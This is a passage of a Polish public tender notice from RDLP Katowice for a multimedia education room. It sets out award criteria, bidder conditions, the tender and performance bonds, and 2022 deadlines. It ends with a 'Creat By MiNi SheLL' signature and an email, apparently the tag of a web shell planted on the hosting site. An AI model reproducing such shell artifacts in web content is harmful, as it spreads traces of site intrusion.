<span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Próbka kontentu multimedialnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/> Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełnienia tego<br/>warunku udziału w postępowaniu.<br/>Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełnienia tego<br/>warunku udziału w postępowaniu.<br/>Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełnienia tego warunku udziału w postępowaniu.<br/> Zdolności technicznej lub zawodowej.<br/> Warunek ten w zakresie doświadczenia zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że w okresie 3 lat przed upływem terminu składania ofert (a<br/>jeśli okres prowadzenia działalności jest krótszy – w tym czasie) wykonał z należytą<br/>starannością przynajmniej jedną dostawę wraz z montażem urządzeń<br/>multimedialnych – na kwotę netto: minimum 200 tys. PLN.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia.<br/>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o<br/>których mowa w rozdziale 9.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia warunki udziału w postępowaniu określone w pkt. 7.1. powinni spełniać łącznie<br/>wszyscy Wykonawcy, z zastrzeżeniem, iż warunek opisany w pkt. 7.1.4.1. winien spełniać co<br/>najmniej jeden z tych Wykonawców.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych Wykonawców, którzy wykonają usługi, do realizacji których te zdolności<br/>są wymagane. W przypadku, o którym mowa w pkt. 7.1.4. SWZ, Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy.<br/>Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na<br/>podstawie art. 116 ust. 2 PZP może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych<br/>interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych<br/>wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych o ile<br/>wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, dane<br/>umożliwiające dostęp do tych środków.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli<br/>podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi<br/>oświadczenia, o którym mowa w art. 125 ust. 1 PZP.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/><br/>Wykonawca może, w celu potwierdzenia spełnienia warunków udziału w postępowaniu,<br/>polegać na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt 7.1.4 SWZ)<br/>innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca, który polega na zdolnościach technicznych lub zawodowych (warunki<br/>wskazane w pkt 7.1.4) podmiotów udostępniających zasoby, składa wraz z ofertą:<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, potwierdza,<br/>że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określa w szczególności: (1) zakres dostępnych<br/>wykonawcy zasobów podmiotu udostępniającego zasoby; (2) sposób i okres<br/>udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia; (3) czy i w jakim zakresie<br/>podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w<br/>odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane<br/>zdolności dotyczą. Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 7 do SWZ.<br/>Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu (w<br/>zakresie warunku w stosunku, do którego udostępnia swój potencjał) na formularzu<br/>którego wzór stanowi załącznik nr 2A do SWZ. Oświadczenie, o którym mowa winno być<br/>złożone pod rygorem nieważności, w formie elektronicznej.<br/>Jeżeli w dokumentach złożonych na potwierdzenie spełnienia warunków udziału w<br/>postępowaniu jakiekolwiek wartości zostaną podane w walucie obcej to Zamawiający<br/>przeliczy wartość waluty na złote wedle średniego kursu NBP z dnia publikacji ogłoszenia o<br/>zamówieniu do Biuletynu Zamówień Publicznych.<br/><br/>Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi<br/>posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści<br/>pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie<br/>określać zakres umocowania.<br/>Oświadczenie, o którym mowa w pkt. 9.1. SWZ składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>składane na formularzu stanowiącym załącznik nr 2 do SWZ powinno zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie podmiotowych środków dowodowych. Podmiotowe środki dowodowe Wykonawca będzie obowiązany złożyć w terminie wskazanym przez Zamawiającego, nie krótszym niż 5 dni, określonym w wezwaniu wystosowanym przez Zamawiającego do Wykonawcy po otwarciu ofert w trybie art. 274 ust. 1 PZP. Dokumenty<br/>powinny być aktualne na dzień ich złożenia.<br/>Wykaz dostaw wraz z montażem wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości netto, przedmiotu (rodzaju wykonanych dostaw), dat wykonania (dat dziennych rozpoczęcia i zakończenia realizacji) i podmiotów, na rzecz których dostawy zostały wykonane (wzór wykazu wykonanych dostaw z montażem<br/>stanowi załącznik nr 3 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wraz z montażem,<br/>wykonanych wspólnie z innymi wykonawcami, informacje o których mowa wyżej<br/>dotyczą dostaw wraz z montażem faktycznie przez niego wykonanych, a w przypadku<br/>świadczeń powtarzających się lub ciągłych - również faktycznie przez niego<br/>wykonywanych.<br/>Dowody, że wskazane przez wykonawcę dostawy wraz z montażem na potwierdzenie<br/>spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej<br/>w zakresie doświadczenia zostały wykonane lub są wykonywane należycie, Dowodami,<br/>o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub<br/>ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw, wykonanych<br/>wspólnie z innymi wykonawcami, informacje o których mowa wyżej dotyczą dostaw faktycznie przez niego wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych - również faktycznie przez niego wykonywanych.<br/> Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności<br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275 ze zm.), z innym<br/>Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia<br/>Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku<br/>przynależności do tej grupy kapitałowej stanowi załącznik nr 6 do SWZ).<br/>Podmiotowe środki dowodowe Wykonawca będzie obowiązany złożyć w terminie<br/>wskazanym przez Zamawiającego, nie krótszym niż 5 dni, określonym w wezwaniu<br/>wystosowanym przez Zamawiającego do Wykonawcy po otwarciu ofert w trybie art. 274<br/>ust. 1 PZP. Dokumenty wskazane w pkt 9.2.1 - 9.2.3. SWZ powinny być aktualne na dzień ich<br/>złożenia.<br/>Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie<br/>zamówienia, Zamawiający może na każdym etapie postępowania, wezwać wykonawców do<br/>złożenia wszystkich lub niektórych wyżej wymienionych podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki<br/>dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać wykonawcę lub<br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 5 000 zł.<br/><br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie<br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art.<br/>98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>11.2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>11.2.1. pieniądzu,<br/>11.2.2. gwarancjach bankowych,<br/>11.2.3. gwarancjach ubezpieczeniowych,<br/>11.2.4. poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>11.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BNP Paribas Bank Polska S.A, nr rachunku: 54 2030 0045 1110<br/>0000 0042 8940 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na<br/>„Dostosowanie sali w Ośrodku Edukacji Przyrodniczo-Leśnej w RDLP w<br/>Katowicach do prowadzenia interaktywnych, multimedialnych zajęć<br/>edukacyjnych”. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym<br/>terminie składania ofert zostanie zaliczone na rachunku bankowym Zamawiającego.<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>11.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej<br/>lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty<br/>Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2.2, 11.2.3<br/>i 11.2.4 należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci<br/>elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób<br/>upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną część<br/>zamówienia przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie<br/>wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w<br/>przypadku, o którym mowa w art. 98 ust. 3 PZP zostanie odrzucona z postępowania na<br/>podstawie art. 226 ust. 1 pkt 14 PZP.<br/>11.6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>11.6.1. nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz wskazanie ich siedzib;<br/>11.6.2. określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –<br/>określenie przedmiotu zamówienia;<br/>11.6.3. kwotę gwarancji/poręczenia;<br/>11.6.4. zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie<br/>kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia warunki udziału w postępowaniu określone w pkt. 7.1. SWZ powinni spełniać łącznie<br/>wszyscy Wykonawcy, z zastrzeżeniem, iż warunek opisany w pkt. 7.1.4.1. SWZ winien spełniać co<br/>najmniej jeden z tych Wykonawców.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych Wykonawców, którzy wykonają usługi, do realizacji których te zdolności<br/>są wymagane. W przypadku, o którym mowa w pkt. 7.1.4. SWZ, Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy.<br/><br/>W formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/> Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi<br/>posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści<br/>pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie<br/>określać zakres umocowania.<br/> Oświadczenie, o którym mowa w pkt. 9.1. składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>składane na formularzu stanowiącym załącznik nr 2 do SWZ powinno zostać złożone<br/>wraz z ofertą pod rygorem nieważności, w formie elektronicznej.<br/>Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy.<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań,<br/>otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich<br/>partnerów.<br/><br/>Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy<br/>w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia łącznie lub każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 5 do SWZ.<br/>1.	Zmiana postanowień umowy może nastąpić pisemnie, wyłącznie za zgodą obu stron w zakresie Specyfikacji Warunków Zamówienia i złożonej oferty, wyrażona w postaci aneksu lub odrębnej umowy.<br/>2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z wymienionych poniżej okoliczności, z uwzględnieniem podawanych warunków ich wprowadzenia:<br/>2.1.	Zmiana terminu realizacji umowy:<br/>2.1.1.	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, <br/>w szczególności wstrzymanie prac przez Zamawiającego z uwagi na konieczność usunięcia błędów.<br/>2.1.2.	zmiany będące następstwem działania organów administracji, w szczególności: przekroczenie określonych prawem terminów wydawania przez organy administracji decyzji, zezwoleń, itp. lub odmowa w tym zakresie.<br/>2.2.	Zmiana sposobu spełnienia świadczenia – zmiany technologiczne:<br/>2.2.1.	konieczność realizacji umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem;<br/>2.2.2.	konieczność realizacji umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa. Zmiany te będą wprowadzone wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Otwarcie ofertRDLP w Katowicach - sala konferencyjna im. Jana Kozyry (budynek w podwórzu).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 20.1. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy przez<br/>Wykonawcę, którego oferta została uznana za najkorzystniejszą.<br/>20.2. Zabezpieczenie należytego wykonania umowy wynosić będzie 5 % ceny łącznej zamówienia<br/>(brutto).<br/>20.3. Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku<br/>następujących formach:<br/>20.3.1. pieniądzu;<br/>20.3.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowokredytowej<br/>z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>20.3.3. gwarancjach bankowych;<br/>20.3.4. gwarancjach ubezpieczeniowych;<br/>20.3.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości.<br/>20.4. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na<br/>zaliczenie kwoty wadium na poczet zabezpieczenia.<br/>20.5. Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek<br/>bankowy wskazany przez Zamawiającego. Jeżeli zabezpieczenie wniesiono w pieniądzu,<br/>Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający<br/>zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy<br/>rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt<br/>prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek<br/>bankowy Wykonawcy.<br/>20.6. Zabezpieczenie należytego wykonania umowy, we wszystkich formach przewidzianych w<br/>pkt. 20.3. SWZ, powinno zabezpieczać roszczenia wynikające z niewykonania bądź<br/>nienależytego wykonania umowy w taki sam sposób, co oznacza, iż zabezpieczenie<br/>wniesione w formie innej niż pieniądz nie może zabezpieczać roszczeń Zamawiającego w sposób mniej korzystny, niż jakby miało to miejsce w przypadku wniesienia zabezpieczenia<br/>w pieniądzu. Zabezpieczenie należytego wykonania umowy w formie gwarancji/poręczenia<br/>powinno być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie<br/>Zamawiającego. Zamawiający nie dopuszcza możliwości uzależnienia wypłaty kwot z<br/>gwarancji/poręczenia od przedłożenia jakichkolwiek dodatkowych dokumentów bądź<br/>spełnienia jakichkolwiek warunków, poza oświadczeniem Zamawiającego, iż żądana kwota<br/>jest należna z tytułu niewykonania bądź nienależytego wykonania umowy.<br/>20.7. Zamawiający zwróci zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia i<br/>uznania przez Zamawiającego za należycie wykonane.

Creat By MiNi SheLL
Email: jattceo@gmail.com